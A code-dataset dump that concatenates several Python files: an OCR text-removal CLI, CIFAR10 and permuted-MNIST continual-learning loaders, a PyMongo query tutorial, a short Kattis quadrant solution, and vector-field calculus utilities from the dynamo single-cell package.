from .util import load_image
from .util import load_images
import os
def get_args():
parser = argparse.ArgumentParser()
parser.add_argument("images", nargs="+", help="Images to process. Required")
parser.add_argument("-e", "--edge", type=int, default=1, help="Extra margin at the edges of detected boxes. Default: 1")
parser.add_argument("-r", "--radius", type=int, default=1, help="Radius for rounded corners. 0 = no rounding. Default: 1")
parser.add_argument("-o", "--output", default=".", help="Output folder. Default: . (current dir)")
parser.add_argument("-of","--output_format", default=None, help="Output format (jpg, png...). Default: same as input")
parser.add_argument("-s", "--suffix", default="_result", help="Suffix for results. Default: _result")
parser.add_argument("-m", "--mask_suffix", default=None, help="Suffix for storing mask. Default: don't store mask")
parser.add_argument("-c", "--copy", action="store_true", help="Copy original image to output folder.")
parser.add_argument("-d", "--device", default="cuda", help="Device to use (cuda, cuda:0, cpu...). Default: cuda")
parser.add_argument("-l", "--languages", type=str, nargs="+", default=["en"], help="Languages to detect. See https://www.jaided.ai/easyocr/ for supported languages and their abbreviations. Default: en")
return parser.parse_args()
def cli():
args = get_args()
image_names = [os.path.splitext(os.path.basename(image)) for image in args.images]
images = load_images(args.images)
tr = TextRemover(languages=args.languages, device=args.device)
os.makedirs(args.output, exist_ok=True)
for (image, (name, ext)) in zip(images, image_names):
result_name = os.path.join(args.output, name + args.suffix + (args.output_format or ext))
mask_name = os.path.join(args.output, name + (args.mask_suffix or "") + (args.output_format or ext))
image_name = os.path.join(args.output, name + (args.output_format or ext))
result, mask = tr(image, mask_edge=args.edge, radius=args.radius)
result.save(result_name)
if args.mask_suffix:
mask.save(mask_name)
if args.copy:
image.save(image_name)
print("result: {}{}".format(result_name, ("\nmask: " + mask_name) if args.mask_suffix else ""))
| 2.65625 | 3 |
dataset/cifar10.py | JuliousHurtado/Meta-Iteration | 0 | 12769676 | <reponame>JuliousHurtado/Meta-Iteration
import torch
import random
import copy
import numpy as np
from collections import defaultdict
from PIL import Image
from torchvision import transforms
import torchvision.transforms.functional as F
import learn2learn as l2l
from dataset.datasets_utils import create_bookkeeping
from torchvision import datasets
from PIL import Image
import os
import sys
if sys.version_info[0] == 2:
import cPickle as pickle
else:
import pickle
class DatasetGen(object):
def __init__(self, args):
super(DatasetGen, self).__init__()
self.batch_size = args.batch_size
self.pc_valid = 0.15
self.root = './data'
self.args = args
self.num_task = 3
self.inputsize = [3,32,32]
self.num_workers = 4
self.pin_memory = True
self.taskcla = []
self.labels = [[0,1,2,3],[4,5,6],[7,8,9]]
for i in range(self.num_task):
self.taskcla.append(len(self.labels[i]))
print('taskcla =', self.taskcla)
self.data_loader = []
self.set_dataloader()
def set_dataloader(self):
data_transforms = {
'train': transforms.Compose([
transforms.Resize(32),
transforms.RandomHorizontalFlip(),
transforms.ToTensor(),
transforms.Normalize([0.485, 0.456, 0.406], [0.229, 0.224, 0.225])
]),
'val': transforms.Compose([
transforms.Resize(32),
transforms.ToTensor(),
transforms.Normalize([0.485, 0.456, 0.406], [0.229, 0.224, 0.225])
]),
}
for task in range(self.num_task):
train_dataset = DividedCIFAR10('data', train=True, labels = self.labels[task], transform = data_transforms['train'], args = self.args)
test_dataset = DividedCIFAR10('data', train=False, labels = self.labels[task], transform = data_transforms['val'], args = self.args)
split = int(np.floor(self.pc_valid * len(train_dataset)))
train_split, valid_split = torch.utils.data.random_split(train_dataset, [len(train_dataset) - split, split])
if self.args.meta_learn:
meta_dataset = copy.deepcopy(train_dataset)
meta_loader = self.get_meta_loader(meta_dataset)
else:
meta_loader = None
train_loader = torch.utils.data.DataLoader(train_split, batch_size=self.batch_size, num_workers=self.num_workers,
pin_memory=self.pin_memory,shuffle=True)
valid_loader = torch.utils.data.DataLoader(valid_split, batch_size=self.batch_size,
num_workers=self.num_workers, pin_memory=self.pin_memory,shuffle=False)
test_loader = torch.utils.data.DataLoader(test_dataset, batch_size=self.batch_size, num_workers=self.num_workers,
pin_memory=self.pin_memory,shuffle=False)
self.data_loader.append({ 'train': train_loader, 'valid': valid_loader, 'test': test_loader, 'meta': meta_loader})
def get(self, task_id):
return self.data_loader
def get_meta_loader(self, meta_dataset):
create_bookkeeping(meta_dataset, self.args.ways, self.args.meta_label)
meta_transforms = [
l2l.data.transforms.NWays(meta_dataset, self.args.ways),
l2l.data.transforms.KShots(meta_dataset, 2*self.args.shots),
l2l.data.transforms.LoadData(meta_dataset),
l2l.data.transforms.RemapLabels(meta_dataset),
l2l.data.transforms.ConsecutiveLabels(meta_dataset),
]
meta_loader = l2l.data.TaskDataset(l2l.data.MetaDataset(meta_dataset),
task_transforms=meta_transforms)
return meta_loader
class PermutedMNIST(datasets.MNIST):
def __init__(self, root="mnist", train=True, permute_idx=None, transform = None):
super(PermutedMNIST, self).__init__(root, train, download=True)
assert len(permute_idx) == 28 * 28
self.data = torch.stack([img.float().view(-1)[permute_idx] / 255
for img in self.data])
self.transform = transform
def __getitem__(self, index):
img, target = self.data[index], int(self.targets[index])
if self.transform:
img = self.transform(img)
return img, target
def get_sample(self, sample_size):
sample_idx = random.sample(range(len(self)), sample_size)
return [img for img in self.data[sample_idx]]
class DividedCIFAR10(datasets.CIFAR10):
def __init__(self, root, train=True,
transform=None,
target_transform=None,
download=True,
labels = [],
args = None):
super(DividedCIFAR10, self).__init__(root, train, transform, target_transform, download)
self.transform = transform
self.target_transform = None
self.root = root
self.train = train # training set or test set
#if download:
# self.download()
#if not self._check_integrity():
# raise RuntimeError('Dataset not found or corrupted.' +
# ' You can use download=True to download it')
if self.train:
downloaded_list = self.train_list
else:
downloaded_list = self.test_list
self.data = []
self.targets = []
# now load the picked numpy arrays
for file_name, checksum in downloaded_list:
file_path = os.path.join(self.root, self.base_folder, file_name)
with open(file_path, 'rb') as f:
if sys.version_info[0] == 2:
entry = pickle.load(f)
else:
entry = pickle.load(f, encoding='latin1')
if 'labels' in entry:
lab = entry['labels']
else:
lab = entry['fine_labels']
for i,l in enumerate(lab):
if l in labels and (len(self.data) < args.num_data or args.num_data == -1):
self.data.append(entry['data'][i])
self.targets.append(labels.index(l))
self.data = np.vstack(self.data).reshape(-1, 3, 32, 32)
self.data = self.data.transpose((0, 2, 3, 1)) # convert to HWC
self._load_meta()
def get_sample(self, sample_size):
sample_idx = random.sample(range(len(self)), sample_size)
temp = []
for img in self.data[sample_idx]:
if self.transform:
img = self.transform(Image.fromarray(img)).unsqueeze(0)
temp.append(img)
return temp | 2.671875 | 3 |
Week_2/02_pymongo_query_find.py | KartikKannapur/MongoDB_M101P | 0 | 12769677 | <filename>Week_2/02_pymongo_query_find.py<gh_stars>0
__author__ = "<NAME>"
# #Import Python Libraries
from pymongo import MongoClient
import json
# #Import Property Files
# import properties as prop
json_properties_file = open("properties.json")
json_properties = json.loads(json_properties_file.read())
# #Connect to the Mongo Database
client = MongoClient(json_properties["host"], json_properties["port"])
# auth = client.admin.authenticate(json_properties["username"], json_properties["password"])
# #Database - test
# #Collection - people
database = client.test
collection = database.people
# #Connect to the Database
print " --- Return all documents --- "
# #find() returns a cursor in python
print list(collection.find())
print " --- Find One document --- "
print collection.find_one()
print " --- Find One document with a query condition --- "
query_1 = {"age" : 45}
print collection.find_one(query_1)
# #Projections
print " --- Finding documents with Projections --- "
query_2 = {"age" : 45}
# #SELECT name & I don't want to see _id
projection = {"name" : 1, "_id" : 0}
print list(collection.find(query_2, projection))
# #Insert
# #insert_one()
# #insert_many([list_of_documents_to_be_inserted], flag = order_in_which_they_have_to_be_inserted )
# #Update
# #update_one()
# #update_many()
# #upsert()
# #Delete
# #delete_one()
# #delete_many()
| 3.109375 | 3 |
kattis/python/quadrant_selection.py | PixPanz/VariousTomfoolery | 0 | 12769678 | x = int(input())
y = int(input())
ans = 0
if x > 0:
if y > 0:
ans = 1
else: ans = 4
else:
if y > 0:
ans = 2
else: ans = 3
print(ans) | 3.65625 | 4 |
dynamo/vectorfield/utils.py | davisidarta/dynamo-release | 0 | 12769679 | from tqdm import tqdm
import numpy as np
import pandas as pd
from scipy.spatial.distance import cdist
from scipy.sparse import issparse
import numdifftools as nd
from multiprocessing.dummy import Pool as ThreadPool
import multiprocessing as mp
import itertools, functools
from ..tools.utils import timeit
def is_outside_domain(x, domain):
x = x[None, :] if x.ndim == 1 else x
return np.any(np.logical_or(x < domain[0], x > domain[1]), axis=1)
def grad(f, x):
"""Gradient of scalar-valued function f evaluated at x"""
return nd.Gradient(f)(x)
def laplacian(f, x):
"""Laplacian of scalar field f evaluated at x"""
hes = nd.Hessdiag(f)(x)
return sum(hes)
# ---------------------------------------------------------------------------------------------------
# vector field function
@timeit
def vector_field_function(x, vf_dict, dim=None, kernel='full', **kernel_kwargs):
"""vector field function constructed by sparseVFC.
Reference: Regularized vector field learning with sparse approximation for mismatch removal, Ma, Jiayi, etc. al, Pattern Recognition
"""
# x=np.array(x).reshape((1, -1))
if "div_cur_free_kernels" in vf_dict.keys():
has_div_cur_free_kernels = True
else:
has_div_cur_free_kernels = False
#x = np.array(x)
if x.ndim == 1:
x = x[None, :]
if has_div_cur_free_kernels:
if kernel == 'full':
kernel_ind = 0
elif kernel == 'df_kernel':
kernel_ind = 1
elif kernel == 'cf_kernel':
kernel_ind = 2
else:
raise ValueError(f"the kernel can only be one of {'full', 'df_kernel', 'cf_kernel'}!")
K = con_K_div_cur_free(x, vf_dict["X_ctrl"], vf_dict["sigma"], vf_dict["eta"], **kernel_kwargs)[kernel_ind]
else:
Xc = vf_dict["X_ctrl"]
K = con_K(x, Xc, vf_dict["beta"], **kernel_kwargs)
K = K.dot(vf_dict["C"])
if dim is not None and not has_div_cur_free_kernels:
if np.isscalar(dim):
K = K[:, :dim]
elif dim is not None:
K = K[:, dim]
return K
@timeit
def con_K(x, y, beta, method='cdist', return_d=False):
"""con_K constructs the kernel K, where K(i, j) = k(x, y) = exp(-beta * ||x - y||^2).
Arguments
---------
x: :class:`~numpy.ndarray`
Original training data points.
y: :class:`~numpy.ndarray`
Control points used to build kernel basis functions.
beta: float (default: 0.1)
Paramerter of Gaussian Kernel, k(x, y) = exp(-beta*||x-y||^2),
return_d: bool
If True the intermediate 3D matrix x - y will be returned for analytical Jacobian.
Returns
-------
K: :class:`~numpy.ndarray`
the kernel to represent the vector field function.
"""
if method == 'cdist' and not return_d:
K = cdist(x, y, 'sqeuclidean')
if len(K) == 1:
K = K.flatten()
else:
n = x.shape[0]
m = y.shape[0]
# https://stackoverflow.com/questions/1721802/what-is-the-equivalent-of-matlabs-repmat-in-numpy
# https://stackoverflow.com/questions/12787475/matlabs-permute-in-python
D = np.matlib.tile(x[:, :, None], [1, 1, m]) - np.transpose(
np.matlib.tile(y[:, :, None], [1, 1, n]), [2, 1, 0])
K = np.squeeze(np.sum(D ** 2, 1))
K = -beta * K
K = np.exp(K)
if return_d:
return K, D
else:
return K
@timeit
def con_K_div_cur_free(x, y, sigma=0.8, eta=0.5):
"""Construct a convex combination of the divergence-free kernel T_df and curl-free kernel T_cf with a bandwidth sigma
and a combination coefficient gamma.
Arguments
---------
x: :class:`~numpy.ndarray`
Original training data points.
y: :class:`~numpy.ndarray`
Control points used to build kernel basis functions
sigma: int (default: `0.8`)
Bandwidth parameter.
eta: int (default: `0.5`)
Combination coefficient for the divergence-free or the curl-free kernels.
Returns
-------
A tuple of G (the combined kernel function), divergence-free kernel and curl-free kernel.
See also: :func:`sparseVFC`.
"""
m, d = x.shape
n, d = y.shape
sigma2 = sigma ** 2
G_tmp = np.matlib.tile(x[:, :, None], [1, 1, n]) - np.transpose(
np.matlib.tile(y[:, :, None], [1, 1, m]), [2, 1, 0]
)
G_tmp = np.squeeze(np.sum(G_tmp ** 2, 1))
G_tmp3 = -G_tmp / sigma2
G_tmp = -G_tmp / (2 * sigma2)
G_tmp = np.exp(G_tmp) / sigma2
G_tmp = np.kron(G_tmp, np.ones((d, d)))
x_tmp = np.matlib.tile(x, [n, 1])
y_tmp = np.matlib.tile(y, [1, m]).T
y_tmp = y_tmp.reshape((d, m * n), order='F').T
xminusy = x_tmp - y_tmp
G_tmp2 = np.zeros((d * m, d * n))
tmp4_ = np.zeros((d, d))
for i in tqdm(range(d), desc="Iterating each dimension in con_K_div_cur_free:"):
for j in np.arange(i, d):
tmp1 = xminusy[:, i].reshape((m, n), order='F')
tmp2 = xminusy[:, j].reshape((m, n), order='F')
tmp3 = tmp1 * tmp2
tmp4 = tmp4_.copy()
tmp4[i, j] = 1
tmp4[j, i] = 1
G_tmp2 = G_tmp2 + np.kron(tmp3, tmp4)
G_tmp2 = G_tmp2 / sigma2
G_tmp3 = np.kron((G_tmp3 + d - 1), np.eye(d))
G_tmp4 = np.kron(np.ones((m, n)), np.eye(d)) - G_tmp2
df_kernel, cf_kernel = (1 - eta) * G_tmp * (G_tmp2 + G_tmp3), eta * G_tmp * G_tmp4
G = df_kernel + cf_kernel
return G, df_kernel, cf_kernel
def vecfld_from_adata(adata, basis='', vf_key='VecFld'):
if basis is not None or len(basis) > 0:
vf_key = '%s_%s' % (vf_key, basis)
if vf_key not in adata.uns.keys():
raise ValueError(
f'Vector field function {vf_key} is not included in the adata object! '
f"Try firstly running dyn.tl.VectorField(adata, basis='{basis}')")
vf_dict = adata.uns[vf_key]['VecFld']
func = lambda x: vector_field_function(x, vf_dict)
return vf_dict, func
def vector_transformation(V, Q):
"""Transform vectors from PCA space to the original space using the formula:
:math:`\hat{v} = v Q^T`,
where `Q, v, \hat{v}` are the PCA loading matrix, low dimensional vector and the
transformed high dimensional vector.
Parameters
----------
V: :class:`~numpy.ndarray`
The n x k array of vectors to be transformed, where n is the number of vectors,
k the dimension.
Q: :class:`~numpy.ndarray`
PCA loading matrix with dimension d x k, where d is the dimension of the original space,
and k the number of leading PCs.
Returns
-------
ret: :class:`~numpy.ndarray`
The array of transformed vectors.
"""
return V @ Q.T
def vector_field_function_transformation(vf_func, Q):
"""Transform vector field function from PCA space to the original space.
The formula used for transformation:
:math:`\hat{f} = f Q^T`,
where `Q, f, \hat{f}` are the PCA loading matrix, low dimensional vector field function and the
transformed high dimensional vector field function.
Parameters
----------
vf_func: callable
The vector field function.
Q: :class:`~numpy.ndarray`
PCA loading matrix with dimension d x k, where d is the dimension of the original space,
and k the number of leading PCs.
Returns
-------
ret: callable
The transformed vector field function.
"""
return lambda x: vf_func.func(x) @ Q.T
# ---------------------------------------------------------------------------------------------------
# jacobian
def Jacobian_rkhs_gaussian(x, vf_dict, vectorize=False):
"""analytical Jacobian for RKHS vector field functions with Gaussian kernel.
Arguments
---------
x: :class:`~numpy.ndarray`
Coordinates where the Jacobian is evaluated.
vf_dict: dict
A dictionary containing RKHS vector field control points, Gaussian bandwidth,
and RKHS coefficients.
Essential keys: 'X_ctrl', 'beta', 'C'
Returns
-------
J: :class:`~numpy.ndarray`
Jacobian matrices stored as d-by-d-by-n numpy arrays evaluated at x.
d is the number of dimensions and n the number of coordinates in x.
"""
if x.ndim == 1:
K, D = con_K(x[None, :], vf_dict['X_ctrl'], vf_dict['beta'], return_d=True)
J = (vf_dict['C'].T * K) @ D[0].T
elif not vectorize:
n, d = x.shape
J = np.zeros((d, d, n))
for i, xi in enumerate(x):
K, D = con_K(xi[None, :], vf_dict['X_ctrl'], vf_dict['beta'], return_d=True)
J[:, :, i] = (vf_dict['C'].T * K) @ D[0].T
else:
K, D = con_K(x, vf_dict['X_ctrl'], vf_dict['beta'], return_d=True)
if K.ndim == 1: K = K[None, :]
J = np.einsum('nm, mi, njm -> ijn', K, vf_dict['C'], D)
return -2 * vf_dict['beta'] * J
def Jacobian_rkhs_gaussian_parallel(x, vf_dict, cores=None):
n = len(x)
if cores is None: cores = mp.cpu_count()
n_j_per_core = int(np.ceil(n / cores))
xx = []
for i in range(0, n, n_j_per_core):
xx.append(x[i:i+n_j_per_core])
#with mp.Pool(cores) as p:
# ret = p.starmap(Jacobian_rkhs_gaussian, zip(xx, itertools.repeat(vf_dict)))
with ThreadPool(cores) as p:
ret = p.starmap(Jacobian_rkhs_gaussian, zip(xx, itertools.repeat(vf_dict)))
ret = [np.transpose(r, axes=(2, 0, 1)) for r in ret]
ret = np.transpose(np.vstack(ret), axes=(1, 2, 0))
return ret
def Jacobian_numerical(f, input_vector_convention='row'):
'''
Get the numerical Jacobian of the vector field function.
If the input_vector_convention is 'row', it means that fjac takes row vectors
as input, otherwise the input should be an array of column vectors. Note that
the returned Jacobian would behave exactly the same if the input is an 1d array.
The column vector convention is slightly faster than the row vector convention.
So the matrix of row vector convention is converted into column vector convention
under the hood.
No matter the input vector convention, the returned Jacobian is of the following
format:
df_1/dx_1 df_1/dx_2 df_1/dx_3 ...
df_2/dx_1 df_2/dx_2 df_2/dx_3 ...
df_3/dx_1 df_3/dx_2 df_3/dx_3 ...
... ... ... ...
'''
fjac = nd.Jacobian(lambda x: f(x.T).T)
if input_vector_convention == 'row' or input_vector_convention == 0:
def f_aux(x):
x = x.T
return fjac(x)
return f_aux
else:
return fjac
@timeit
def elementwise_jacobian_transformation(Js, qi, qj):
"""Inverse transform low dimensional k x k Jacobian matrix (:math:`\partial F_i / \partial x_j`) back to the
d-dimensional gene expression space. The formula used to inverse transform Jacobian matrix calculated from
low dimension (PCs) is:
:math:`Jac = Q J Q^T`,
where `Q, J, Jac` are the PCA loading matrix, low dimensional Jacobian matrix and the inverse transformed high
dimensional Jacobian matrix. This function takes only one row from Q to form qi or qj.
Parameters
----------
Js: :class:`~numpy.ndarray`
k x k x n matrices of n k-by-k Jacobians.
qi: :class:`~numpy.ndarray`
The i-th row of the PC loading matrix Q with dimension d x k, corresponding to the regulator gene i.
qj: :class:`~numpy.ndarray`
The j-th row of the PC loading matrix Q with dimension d x k, corresponding to the effector gene j.
Returns
-------
ret: :class:`~numpy.ndarray`
The calculated vector of Jacobian matrix (:math:`\partial F_i / \partial x_j`) for each cell.
"""
Js = np.atleast_3d(Js)
n = Js.shape[2]
ret = np.zeros(n)
for i in tqdm(range(n), "calculating Jacobian for each cell"):
ret[i] = qi @ Js[:, :, i] @ qj
return ret
@timeit
def subset_jacobian_transformation(Js, Qi, Qj, cores=1):
"""Transform Jacobian matrix (:math:`\partial F_i / \partial x_j`) from PCA space to the original space.
The formula used for transformation:
:math:`\hat{J} = Q J Q^T`,
where `Q, J, \hat{J}` are the PCA loading matrix, low dimensional Jacobian matrix and the inverse transformed high
dimensional Jacobian matrix. This function takes multiple rows from Q to form Qi or Qj.
Parameters
----------
fjac: callable
The function for calculating numerical Jacobian matrix.
X: :class:`~numpy.ndarray`
The samples coordinates with dimension n_obs x n_PCs, from which Jacobian will be calculated.
Qi: :class:`~numpy.ndarray`
Sampled genes' PCA loading matrix with dimension n' x n_PCs, from which local dimension Jacobian matrix (k x k)
will be inverse transformed back to high dimension.
Qj: :class:`~numpy.ndarray`
Sampled genes' (sample genes can be the same as those in Qi or different) PCs loading matrix with dimension
n' x n_PCs, from which local dimension Jacobian matrix (k x k) will be inverse transformed back to high dimension.
cores: int (default: 1):
Number of cores to calculate Jacobian. If cores is set to be > 1, multiprocessing will be used to
parallel the Jacobian calculation.
return_J: bool (default: False)
Whether to return the raw tensor of Jacobian matrix of each cell before transformation.
Returns
-------
ret: :class:`~numpy.ndarray`
The calculated Jacobian matrix (n_gene x n_gene x n_obs) for each cell.
"""
Js = np.atleast_3d(Js)
Qi = np.atleast_2d(Qi)
Qj = np.atleast_2d(Qj)
d1, d2, n = Qi.shape[0], Qj.shape[0], Js.shape[2]
ret = np.zeros((d1, d2, n))
if cores == 1:
ret = transform_jacobian(Js, Qi, Qj, pbar=True)
else:
if cores is None: cores = mp.cpu_count()
n_j_per_core = int(np.ceil(n / cores))
JJ = []
for i in range(0, n, n_j_per_core):
JJ.append(Js[:, :, i:i+n_j_per_core])
with ThreadPool(cores) as p:
ret = p.starmap(transform_jacobian, zip(JJ,
itertools.repeat(Qi), itertools.repeat(Qj)))
ret = [np.transpose(r, axes=(2, 0, 1)) for r in ret]
ret = np.transpose(np.vstack(ret), axes=(1, 2, 0))
return ret
def transform_jacobian(Js, Qi, Qj, pbar=False):
d1, d2, n = Qi.shape[0], Qj.shape[0], Js.shape[2]
ret = np.zeros((d1, d2, n), dtype=np.float32)
if pbar:
iterj = tqdm(range(n), desc='Transforming subset Jacobian')
else:
iterj = range(n)
for i in iterj:
J = Js[:, :, i]
ret[:, :, i] = Qi @ J @ Qj.T
return ret
def average_jacobian_by_group(Js, group_labels):
"""
Returns a dictionary of averaged jacobians with group names as the keys.
No vectorized indexing was used due to its high memory cost.
"""
d1, d2, _ = Js.shape
groups = np.unique(group_labels)
J_mean = {}
N = {}
for i, g in enumerate(group_labels):
if g in J_mean.keys():
J_mean[g] += Js[:, :, i]
N[g] += 1
else:
J_mean[g] = Js[:, :, i]
N[g] = 1
for g in groups:
J_mean[g] /= N[g]
return J_mean
# ---------------------------------------------------------------------------------------------------
# dynamical properties
def _divergence(f, x):
"""Divergence of the reconstructed vector field function f evaluated at x"""
jac = nd.Jacobian(f)(x)
return np.trace(jac)
@timeit
def compute_divergence(f_jac, X, vectorize_size=1):
"""Calculate divergence for many samples by taking the trace of a Jacobian matrix.
vectorize_size is used to control the number of samples computed in each vectorized batch.
If vectorize_size = 1, there's no vectorization whatsoever.
If vectorize_size = None, all samples are vectorized.
"""
n = len(X)
if vectorize_size is None: vectorize_size = n
div = np.zeros(n)
for i in tqdm(range(0, n, vectorize_size), desc="Calculating divergence"):
J = f_jac(X[i:i+vectorize_size])
div[i:i+vectorize_size] = np.trace(J)
return div
def acceleration_(v, J):
if v.ndim == 1: v = v[:, None]
return J.dot(v)
def curvature_1(a, v):
"""https://link.springer.com/article/10.1007/s12650-018-0474-6"""
if v.ndim == 1: v = v[:, None]
kappa = np.linalg.norm(np.outer(v, a)) / np.linalg.norm(v)**3
return kappa
def curvature_2(a, v):
"""https://dl.acm.org/doi/10.5555/319351.319441"""
# if v.ndim == 1: v = v[:, None]
kappa = (np.multiply(a, np.dot(v, v)) - np.multiply(v, np.dot(v, a))) / np.linalg.norm(v)**4
return kappa
def torsion_(v, J, a):
"""only works in 3D"""
if v.ndim == 1: v = v[:, None]
tau = np.outer(v, a).dot(J.dot(a)) / np.linalg.norm(np.outer(v, a))**2
return tau
@timeit
def compute_acceleration(vf, f_jac, X, return_all=False):
"""Calculate acceleration for many samples via
.. math::
a = J \cdot v.
"""
n = len(X)
acce = np.zeros((n, X.shape[1]))
v_ = vf(X)
J_ = f_jac(X)
for i in tqdm(range(n), desc=f"Calculating acceleration"):
v = v_[i]
J = J_[:, :, i]
acce[i] = acceleration_(v, J).flatten()
if return_all:
return v_, J_, acce
else:
return acce
@timeit
def compute_curvature(vf, f_jac, X, formula=2):
"""Calculate curvature for many samples via
Formula 1:
.. math::
\kappa = \frac{||\mathbf{v} \times \mathbf{a}||}{||\mathbf{V}||^3}
Formula 2:
.. math::
\kappa = \frac{||\mathbf{Jv} (\mathbf{v} \cdot \mathbf{v}) - ||\mathbf{v} (\mathbf{v} \cdot \mathbf{Jv})}{||\mathbf{V}||^4}
"""
n = len(X)
curv = np.zeros(n)
v, _, a = compute_acceleration(vf, f_jac, X, return_all=True)
cur_mat = np.zeros((n, X.shape[1])) if formula == 2 else None
for i in tqdm(range(n), desc="Calculating curvature"):
if formula == 1:
curv[i] = curvature_1(a[i], v[i])
elif formula == 2:
cur_mat[i] = curvature_2(a[i], v[i])
curv[i] = np.linalg.norm(cur_mat[i])
return (curv, cur_mat)
@timeit
def compute_torsion(vf, f_jac, X):
"""Calculate torsion for many samples via
.. math::
\tau = \frac{(\mathbf{v} \times \mathbf{a}) \cdot (\mathbf{J} \cdot \mathbf{a})}{||\mathbf{V} \times \mathbf{a}||^2}
"""
if X.shape[1] != 3:
raise Exception(f'torsion is only defined in 3 dimension.')
n = len(X)
tor = np.zeros((n, X.shape[1], X.shape[1]))
v, J, a = compute_acceleration(vf, f_jac, X, return_all=True)
for i in tqdm(range(n), desc="Calculating torsion"):
tor[i] = torsion_(v[i], J[:, :, i], a[i])
return tor
def _curl(f, x, method='analytical', VecFld=None, jac=None):
"""Curl of the reconstructed vector field f evaluated at x in 3D"""
if jac is None:
if method == 'analytical' and VecFld is not None:
jac = Jacobian_rkhs_gaussian(x, VecFld)
else:
jac = nd.Jacobian(f)(x)
return np.array([jac[2, 1] - jac[1, 2], jac[0, 2] - jac[2, 0], jac[1, 0] - jac[0, 1]])
def curl2d(f, x, method='analytical', VecFld=None, jac=None):
"""Curl of the reconstructed vector field f evaluated at x in 2D"""
if jac is None:
if method == 'analytical' and VecFld is not None:
jac = Jacobian_rkhs_gaussian(x, VecFld)
else:
jac = nd.Jacobian(f)(x)
curl = jac[1, 0] - jac[0, 1]
return curl
@timeit
def compute_curl(f_jac, X):
"""Calculate curl for many samples for 2/3 D systems.
"""
if X.shape[1] > 3:
raise Exception(f'curl is only defined in 2/3 dimension.')
n = len(X)
if X.shape[1] == 2:
curl = np.zeros(n)
f = curl2d
else:
curl = np.zeros((n, 2, 2))
f = _curl
for i in tqdm(range(n), desc=f"Calculating {X.shape[1]}-D curl"):
J = f_jac(X[i])
curl[i] = f(None, None, method='analytical', VecFld=None, jac=J)
return curl
# ---------------------------------------------------------------------------------------------------
# ranking related utilies
def get_metric_gene_in_rank(mat, genes, neg=False):
metric_in_rank = mat.mean(0).A1 if issparse(mat) else mat.mean(0)
rank = metric_in_rank.argsort() if neg else metric_in_rank.argsort()[::-1]
metric_in_rank, genes_in_rank = metric_in_rank[rank], genes[rank]
return metric_in_rank, genes_in_rank
def get_metric_gene_in_rank_by_group(mat, genes, groups, grp, neg=False):
mask = groups == grp
if type(mask) == pd.Series: mask = mask.values
gene_wise_metrics, group_wise_metrics = mat[mask, :].mean(0).A1 if issparse(mat) else mat[mask, :].mean(0), \
mat[mask, :].mean(0).A1 if issparse(mat) else mat[mask, :].mean(0)
rank = gene_wise_metrics.argsort() if neg else gene_wise_metrics.argsort()[::-1]
gene_wise_metrics, genes_in_rank = gene_wise_metrics[rank], genes[rank]
return gene_wise_metrics, group_wise_metrics, genes_in_rank
def get_sorted_metric_genes_df(df, genes, neg=False):
sorted_metric = pd.DataFrame({key: (sorted(values, reverse=False) if neg else sorted(values, reverse=True))
for key, values in df.transpose().iterrows()})
sorted_genes = pd.DataFrame({key: (genes[values.argsort()] if neg else genes[values.argsort()[::-1]])
for key, values in df.transpose().iterrows()})
return sorted_metric, sorted_genes
def rank_vector_calculus_metrics(mat, genes, group, groups, uniq_group):
if issparse(mat):
mask = mat.data > 0
pos_mat, neg_mat = mat.copy(), mat.copy()
pos_mat.data[~ mask], neg_mat.data[mask] = 0, 0
pos_mat.eliminate_zeros()
neg_mat.eliminate_zeros()
else:
mask = mat > 0
pos_mat, neg_mat = mat.copy(), mat.copy()
pos_mat[~ mask], neg_mat[mask] = 0, 0
if group is None:
metric_in_rank, genes_in_rank = get_metric_gene_in_rank(abs(mat), genes)
pos_metric_in_rank, pos_genes_in_rank = get_metric_gene_in_rank(pos_mat, genes)
neg_metric_in_rank, neg_genes_in_rank = get_metric_gene_in_rank(neg_mat, genes, neg=True)
return metric_in_rank, genes_in_rank, pos_metric_in_rank, pos_genes_in_rank, neg_metric_in_rank, neg_genes_in_rank
else:
gene_wise_metrics, gene_wise_genes, gene_wise_pos_metrics, gene_wise_pos_genes, gene_wise_neg_metrics, gene_wise_neg_genes = {}, {}, {}, {}, {}, {}
group_wise_metrics, group_wise_genes, group_wise_pos_metrics, group_wise_pos_genes, group_wise_neg_metrics, group_wise_neg_genes = {}, {}, {}, {}, {}, {}
for i, grp in tqdm(enumerate(uniq_group), desc='ranking genes across gropus'):
gene_wise_metrics[grp], group_wise_metrics[grp], gene_wise_genes[grp] = None, None, None
gene_wise_metrics[grp], group_wise_metrics[grp], gene_wise_genes[grp] = \
get_metric_gene_in_rank_by_group(abs(mat), genes, groups, grp)
gene_wise_pos_metrics[grp], group_wise_pos_metrics[grp], gene_wise_pos_genes[grp] = None, None, None
gene_wise_pos_metrics[grp], group_wise_pos_metrics[grp], gene_wise_pos_genes[grp] = \
get_metric_gene_in_rank_by_group(pos_mat, genes, groups, grp)
gene_wise_neg_metrics[grp], group_wise_neg_metrics[grp], gene_wise_neg_genes[grp] = None, None, None
gene_wise_neg_metrics[grp], group_wise_neg_metrics[grp], gene_wise_neg_genes[grp] = \
get_metric_gene_in_rank_by_group(neg_mat, genes, groups, grp, neg=True)
metric_in_group_rank_by_gene, genes_in_group_rank_by_gene = \
get_sorted_metric_genes_df(pd.DataFrame(group_wise_metrics), genes)
pos_metric_gene_rank_by_group, pos_genes_group_rank_by_gene = \
get_sorted_metric_genes_df(pd.DataFrame(group_wise_pos_metrics), genes)
neg_metric_in_group_rank_by_gene, neg_genes_in_group_rank_by_gene = \
get_sorted_metric_genes_df(pd.DataFrame(group_wise_neg_metrics), genes, neg=True)
metric_in_gene_rank_by_group, genes_in_gene_rank_by_group = \
pd.DataFrame(gene_wise_metrics), pd.DataFrame(gene_wise_genes)
pos_metric_in_gene_rank_by_group, pos_genes_in_gene_rank_by_group = \
pd.DataFrame(gene_wise_pos_metrics), pd.DataFrame(gene_wise_pos_genes)
neg_metric_in_gene_rank_by_group, neg_genes_in_gene_rank_by_group = \
pd.DataFrame(gene_wise_neg_metrics), pd.DataFrame(gene_wise_neg_genes)
return (metric_in_gene_rank_by_group, genes_in_gene_rank_by_group, pos_metric_in_gene_rank_by_group,
pos_genes_in_gene_rank_by_group, neg_metric_in_gene_rank_by_group, neg_genes_in_gene_rank_by_group,
metric_in_group_rank_by_gene, genes_in_group_rank_by_gene, pos_metric_gene_rank_by_group,
pos_genes_group_rank_by_gene, neg_metric_in_group_rank_by_gene, neg_genes_in_group_rank_by_gene,)
| 2.203125 | 2 |
